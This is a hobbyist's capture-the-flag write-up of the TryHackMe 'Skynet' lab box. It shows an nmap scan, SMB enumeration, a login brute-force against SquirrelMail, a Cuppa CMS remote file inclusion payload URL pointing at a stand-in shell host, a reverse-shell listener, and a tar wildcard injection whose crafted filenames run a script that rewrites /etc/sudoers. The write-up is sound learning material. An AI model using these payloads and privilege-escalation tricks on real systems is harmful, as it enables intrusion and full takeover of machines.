TryHackMe — Skynet writeup

Hello, welcome to the writeup for Skynet room from TryHackMe.

Let’s begin with an nmap scan to see what ports are open on the box.

# Nmap

┌─[meowless@rcarmy]─[~/thm/skynet]
└──╼ $sudo nmap -sC -sV -oA nmap/scan 10.10.225.134
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-16 03:20 EST
Nmap scan report for 10.10.225.134
Host is up (0.11s latency).
Not shown: 994 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 99:23:31:bb:b1:e9:43:b7:56:94:4c:b9:e8:21:46:c5 (RSA)
| 256 57:c0:75:02:71:2d:19:31:83:db:e4:fe:67:96:68:cf (ECDSA)
|_ 256 46:fa:4e:fc:10:a5:4f:57:57:d0:6d:54:f6:c3:4d:fe (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Skynet
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: CAPA PIPELINING UIDL RESP-CODES TOP AUTH-RESP-CODE SASL
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap Dovecot imapd
|_imap-capabilities: LOGINDISABLEDA0001 LITERAL+ have post-login OK listed SASL-IR IDLE capabilities ID LOGIN-REFERRALS IMAP4rev1 Pre-login more ENABLE
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
Service Info: Host: SKYNET; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: -3h59m46s, deviation: 3h27m51s, median: -5h59m47s
|_nbstat: NetBIOS name: SKYNET, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: skynet
| NetBIOS computer name: SKYNET\x00
| Domain name: \x00
| FQDN: skynet
|_ System time: 2021-02-15T20:20:41-06:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-02-16T02:20:41
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.70 seconds

So we can see that we do have some ports open, let’s check the smb first

# Smb

┌─[meowless@rcarmy]─[~/thm/skynet]
└──╼ $smbclient -L \\\\10.10.225.134\\
Enter WORKGROUP\meowless's password:
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
anonymous Disk Skynet Anonymous Share
milesdyson Disk Miles Dyson Personal Share
IPC$ IPC IPC Service (skynet server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available

We see 2 shares that stands out, anonymous and milesdyson, let’s connect to anonymous first because i suppose that milesdyson’s share is protected by a password

# Smb Anonymous

┌─[meowless@meowless]─[~/thm/skynet]
└──╼ $smbclient \\\\10.10.225.134\\anonymous
Enter WORKGROUP\meowless's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Nov 26 11:04:00 2020
.. D 0 Tue Sep 17 03:20:17 2019
attention.txt N 163 Tue Sep 17 23:04:59 2019
logs D 0 Wed Sep 18 00:42:16 2019

So we have a file called attention.txt and a directory called logs, let’s grab attention.txt and see what’s inside logs

# Smb attention.txt & logs

smb: \> get attention.txt
getting file \attention.txt of size 163 as attention.txt (0.3 KiloBytes/sec) (average 0.3 KiloBytes/sec)
smb: \> cd logs
smb: \logs\> ls
. D 0 Wed Sep 18 00:42:16 2019
.. D 0 Thu Nov 26 11:04:00 2020
log2.txt N 0 Wed Sep 18 00:42:13 2019
log1.txt N 471 Wed Sep 18 00:41:59 2019
log3.txt N 0 Wed Sep 18 00:42:16 2019
9204224 blocks of size 1024. 5831512 blocks available
smb: \logs\> get log1.txt
getting file \logs\log1.txt of size 471 as log1.txt (1.3 KiloBytes/sec) (average 0.7 KiloBytes/sec)
smb: \logs\>

I chose to take just log1.txt because the rest are empty

looking at attention.txt we get this

┌─[meowless@rcarmy]─[~/thm/skynet]
└──╼ $cat attention.txt
A recent system malfunction has caused various passwords to be changed. All skynet employees are required to change their password after seeing this.
-Miles Dyson

So it’s pretty obvious that we can pull a username out of this

'miles' , 'dyson' , 'mdyson' etc...

But let’s check the content of log1.txt

# Log1.txt

┌─[meowless@rcarmy]─[~/thm/skynet]
└──╼ $cat log1.txt
cyborg007haloterminator
terminator22596
terminator219
terminator20
terminator1989
terminator1988
terminator168
terminator16
terminator143
terminator13
terminator123!@#
terminator1056
terminator101
terminator10
terminator02
terminator00
roboterminator
pongterminator
manasturcaluterminator
exterminator95
exterminator200
dterminator
djxterminator
dexterminator
determinator
cyborg007haloterminator
avsterminator
alonsoterminator
Walterminator
79terminator6
1996terminator

And i suppose that we can use this as a wordlist. Let’s check what’s on the webserver.

So this is like a search page, looking in the source code of the page we can see that this is a static page.

So let’s start a gobuster

┌─[meowless@rcarmy]─[~/thm/skynet]
└──╼ $gobuster dir -u "http://10.10.225.134" -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x php,html --threads 100
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.225.134
[+] Threads: 100
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: php,html
[+] Timeout: 10s
===============================================================
2021/02/16 03:45:10 Starting gobuster
===============================================================
/index.html (Status: 200)
/admin (Status: 301)
/css (Status: 301)
/js (Status: 301)
/config (Status: 301)
/ai (Status: 301)
/squirrelmail (Status: 301)

Right off the bat we find out that there’s an admin panel but going to it gives us 403 forbidden, going to /ai gives us also a 403 forbidden, but there’s that /squirrelmail that we can access, and potentially we could brute it with hydra (i just used burp instead cuz small wordlist), given the wordlist that we found in smb, and some usernames made up on Miles Dyson’s name. Let’s give it a try

milesdyson seems the best username given his name, so i tried with that.

Immediatly i see a different response code and length that could indicate a successful login attempt

Trying to login with that actually works

Browsing to Samba Password reset we can see a password for his private share in smb (the one that we saw earlier) let’s try to login

┌─[meowless@rcarmy]─[~/thm/skynet]
└──╼ $smbclient \\\\10.10.225.134\\milesdyson
Enter WORKGROUP\meowless's password:
tree connect failed: NT_STATUS_ACCESS_DENIED

i’ve tried connecting several times but didn’t work, so i thought, maybe if i specify a username will log me in.

┌─[meowless@rcarmy]─[~/thm/skynet]
└──╼ $smbclient \\\\10.10.225.134\\milesdyson --user=milesdyson
Enter WORKGROUP\milesdyson's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Tue Sep 17 05:05:47 2019
.. D 0 Tue Sep 17 23:51:03 2019
Improving Deep Neural Networks.pdf N 5743095 Tue Sep 17 05:05:14 2019
Natural Language Processing-Building Sequence Models.pdf N 12927230 Tue Sep 17 05:05:14 2019
Convolutional Neural Networks-CNN.pdf N 19655446 Tue Sep 17 05:05:14 2019
notes D 0 Tue Sep 17 05:18:40 2019
Neural Networks and Deep Learning.pdf N 4304586 Tue Sep 17 05:05:14 2019
Structuring your Machine Learning Project.pdf N 3531427 Tue Sep 17 05:05:14 2019
9204224 blocks of size 1024. 5794320 blocks available
smb: \>
And that worked... Looking in the smb we can see just pdf's, but theres a directory called notes, let's check what's insmb: \> cd notes
smb: \notes\> ls
. D 0 Tue Sep 17 05:18:40 2019
.. D 0 Tue Sep 17 05:05:47 2019
3.01 Search.md N 65601 Tue Sep 17 05:01:29 2019
4.01 Agent-Based Models.md N 5683 Tue Sep 17 05:01:29 2019
2.08 In Practice.md N 7949 Tue Sep 17 05:01:29 2019
0.00 Cover.md N 3114 Tue Sep 17 05:01:29 2019
1.02 Linear Algebra.md N 70314 Tue Sep 17 05:01:29 2019
important.txt N 117 Tue Sep 17 05:18:39 2019
6.01 pandas.md N 9221 Tue Sep 17 05:01:29 2019
3.00 Artificial Intelligence.md N 33 Tue Sep 17 05:01:29 2019
2.01 Overview.md N 1165 Tue Sep 17 05:01:29 2019
3.02 Planning.md N 71657 Tue Sep 17 05:01:29 2019
1.04 Probability.md N 62712 Tue Sep 17 05:01:29 2019
2.06 Natural Language Processing.md N 82633 Tue Sep 17 05:01:29 2019
2.00 Machine Learning.md N 26 Tue Sep 17 05:01:29 2019
1.03 Calculus.md N 40779 Tue Sep 17 05:01:29 2019
3.03 Reinforcement Learning.md N 25119 Tue Sep 17 05:01:29 2019
1.08 Probabilistic Graphical Models.md N 81655 Tue Sep 17 05:01:29 2019
1.06 Bayesian Statistics.md N 39554 Tue Sep 17 05:01:29 2019
6.00 Appendices.md N 20 Tue Sep 17 05:01:29 2019
1.01 Functions.md N 7627 Tue Sep 17 05:01:29 2019
2.03 Neural Nets.md N 144726 Tue Sep 17 05:01:29 2019
2.04 Model Selection.md N 33383 Tue Sep 17 05:01:29 2019
2.02 Supervised Learning.md N 94287 Tue Sep 17 05:01:29 2019
4.00 Simulation.md N 20 Tue Sep 17 05:01:29 2019
3.05 In Practice.md N 1123 Tue Sep 17 05:01:29 2019
1.07 Graphs.md N 5110 Tue Sep 17 05:01:29 2019
2.07 Unsupervised Learning.md N 21579 Tue Sep 17 05:01:29 2019
2.05 Bayesian Learning.md N 39443 Tue Sep 17 05:01:29 2019
5.03 Anonymization.md N 2516 Tue Sep 17 05:01:29 2019
5.01 Process.md N 5788 Tue Sep 17 05:01:29 2019
1.09 Optimization.md N 25823 Tue Sep 17 05:01:29 2019
1.05 Statistics.md N 64291 Tue Sep 17 05:01:29 2019
5.02 Visualization.md N 940 Tue Sep 17 05:01:29 2019
5.00 In Practice.md N 21 Tue Sep 17 05:01:29 2019
4.02 Nonlinear Dynamics.md N 44601 Tue Sep 17 05:01:29 2019
1.10 Algorithms.md N 28790 Tue Sep 17 05:01:29 2019
3.04 Filtering.md N 13360 Tue Sep 17 05:01:29 2019
1.00 Foundations.md N 22 Tue Sep 17 05:01:29 2019
9204224 blocks of size 1024. 5794320 blocks available
smb: \notes\>

A shitload of things, but there’s one that stands out, and that is important.txt, let’s check it

smb: \notes\> get important.txt
getting file \notes\important.txt of size 117 as important.txt (0.4 KiloBytes/sec) (average 0.4 KiloBytes/sec)
smb: \notes\> exit
┌─[meowless@rcarmy]─[~/thm/skynet]
└──╼ $cat important.txt
1. Add features to beta CMS /45kra24zxs28v3yd
2. Work on T-800 Model 101 blueprints
3. Spend more time with my wife

So let’s go to the webserver again to that location

There’s just this, looked into the source code of the page but there’s no hidden things, let’s gobuster it

┌─[meowless@rcarmy]─[~/thm/skynet]
└──╼ $gobuster dir -u "http://10.10.225.134/45kra24zxs28v3yd/" -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x php,html --threads 100
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.225.134/45kra24zxs28v3yd/
[+] Threads: 100
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: php,html
[+] Timeout: 10s
===============================================================
2021/02/16 04:48:56 Starting gobuster
===============================================================
/index.html (Status: 200)
/administrator (Status: 301)

after not so much time we can see /administrator, let’s go there.

Let’s try logging in with the credentials that we already know, the password for mail access and the one for smb

After i tried cyborg007haloterminator it didn’t logged me in so let’s try the password that we found in the mail..

none of these 2 combinations worked, so let’s try default credentials, like admin:admin , admin:password etc..

nothing worked, so i went on exploit db and searched cuppa cms

So this is an example of remote file inclusion

http://target/cuppa/alerts/alertConfigField.php?urlConfig=http://www.shell.com/shell.txt?

since we have our cuppa in /administrator directory, our payload will look like this

http://10.10.225.134/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://www.shell.com/shell.txt

So let’s set up a python webserver, and include a shell on the server

And boom , we have a shell. Let’s send a reverse shell

┌─[meowless@meowless]─[~/thm/skynet]
└──╼ $nc -lnvp 4444
listening on [any] 4444 ...
connect to [10.14.7.91] from (UNKNOWN) [10.10.225.134] 35114
/bin/sh: 0: can't access tty; job control turned off
$

After stabilizing the shell, i just went searching for suid binaries vulnerabilities, since this room is aimed for beginners

www-data@skynet:/home/milesdyson$ find / -perm -4000 2>/dev/null
/sbin/mount.cifs
/bin/mount
/bin/fusermount
/bin/umount
/bin/ping
/bin/su
/bin/ping6
/usr/bin/passwd
/usr/bin/sudo
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/pkexec
/usr/bin/chsh
/usr/bin/newgidmap
/usr/bin/at
/usr/bin/newuidmap
/usr/bin/chfn
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/lib/snapd/snap-confine
/usr/lib/openssh/ssh-keysign
www-data@skynet:/home/milesdyson$

Unfortunely, nothing seems to be a vector for us to gain a root shell, so i started poking around.

www-data@skynet:/home/milesdyson/backups$ cat backup.sh 
#!/bin/bash
cd /var/www/html
tar cf /home/milesdyson/backups/backup.tgz *
www-data@skynet:/home/milesdyson/backups$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
*/1 * * * * root /home/milesdyson/backups/backup.sh
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
www-data@skynet:/home/milesdyson/backups$

This looks very interesting, a cron job that runs every minute,

We can clearly see that it uses an asterisk “*” which is a wildcard, there’s a simple way to exploit this, the script goes to /var/www/html and the asterisk sign “*” means everything, after that it runs tar to archive everything in /var/www/html

cd /var/www/html
echo 'echo "www-data ALL=(root) NOPASSWD: ALL" > /etc/sudoers' > privesc.sh
echo "" > "--checkpoint-action=exec=sh privesc.sh"
echo "" > --checkpoint=1

After waiting one minute, we just sudo bash and that’s it

And now you can cat root.txt and finish the room

I really hope you enjoyed reading this writeup, look at my other posts for more:)

Best,
Meowless

Penetration Tester, Cat :)